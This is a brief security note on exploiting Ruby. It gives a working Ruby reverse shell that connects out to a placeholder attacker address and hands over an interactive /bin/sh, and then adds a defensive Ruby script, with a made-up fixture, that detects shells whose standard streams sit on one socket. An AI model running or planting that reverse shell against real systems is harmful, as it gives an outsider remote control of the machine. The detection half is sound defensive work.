Exploiting Ruby
- author:: Nathan Acks
- date:: 2022-07-11
A simple reverse shell:
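```ruby
require "socket"

attacker_ip = "10.0.0.1"
attacker_port = 1234

# Connect out to the listener and keep the socket's file descriptor number.
f = TCPSocket.open(attacker_ip, attacker_port).to_i
# Replace this process with an interactive shell whose stdin, stdout and stderr are that socket.
exec sprintf("/bin/sh -i <&%d >&%d 2>&%d", f, f, f)
```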
Catch it with netcat or socat.
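
From the defender's side, the redirects in the snippet above give the shell a stdin, stdout and stderr that all point at one TCP socket. The following added example (not part of the original note) looks for that pattern in a Linux procfs tree; the function names, the shell list and the sample tree are assumptions constructed for illustration.

```ruby
require "tmpdir"
require "fileutils"

# Process names treated as shells (assumed list; extend for your environment).
SHELLS = %w(sh bash dash zsh ksh ash).freeze

# True when stdin, stdout and stderr all resolve to the same socket inode.
def stdio_on_one_socket?(targets)
  targets.size == 3 && targets.uniq.size == 1 &&
    targets.first.match?(/\Asocket:\[\d+\]\z/)
end

# Walk a procfs-style tree; return [pid, comm, socket] for each matching shell.
def find_socket_shells(proc_root = "/proc")
  pids = Dir.entries(proc_root).grep(/\A\d+\z/).sort_by(&:to_i)
  pids.map do |pid|
    dir = File.join(proc_root, pid)
    begin
      comm = File.read(File.join(dir, "comm")).strip
      next unless SHELLS.include?(comm)
      targets = (0..2).map { |fd| File.readlink(File.join(dir, "fd", fd.to_s)) }
      [pid.to_i, comm, targets.first] if stdio_on_one_socket?(targets)
    rescue SystemCallError
      next # process exited mid-scan, or its fd directory is not readable
    end
  end.compact
end

# Constructed fixture: a fake procfs tree (pids, names and inodes are made up).
def build_sample_proc(root)
  { "4242" => ["sh",   %w(socket:[31337] socket:[31337] socket:[31337])],
    "4300" => ["bash", %w(/dev/pts/0 /dev/pts/0 /dev/pts/0)],
    "4400" => ["ruby", %w(socket:[555] socket:[555] socket:[555])],
    "4500" => ["sh",   %w(socket:[700] socket:[701] socket:[701])] }.each do |pid, (comm, fds)|
    FileUtils.mkdir_p(File.join(root, pid, "fd"))
    File.write(File.join(root, pid, "comm"), "#{comm}\n")
    fds.each_with_index { |t, fd| File.symlink(t, File.join(root, pid, "fd", fd.to_s)) }
  end
end

if __FILE__ == $PROGRAM_NAME
  Dir.mktmpdir do |root|
    build_sample_proc(root)
    find_socket_shells(root).each { |pid, comm, sock| puts "pid=#{pid} comm=#{comm} stdio=#{sock}" }
  end
end
```

Run against the real `/proc` as root to see every process's descriptors. Treat hits as leads to triage, since some legitimate services also hand a shell a socket as its standard streams.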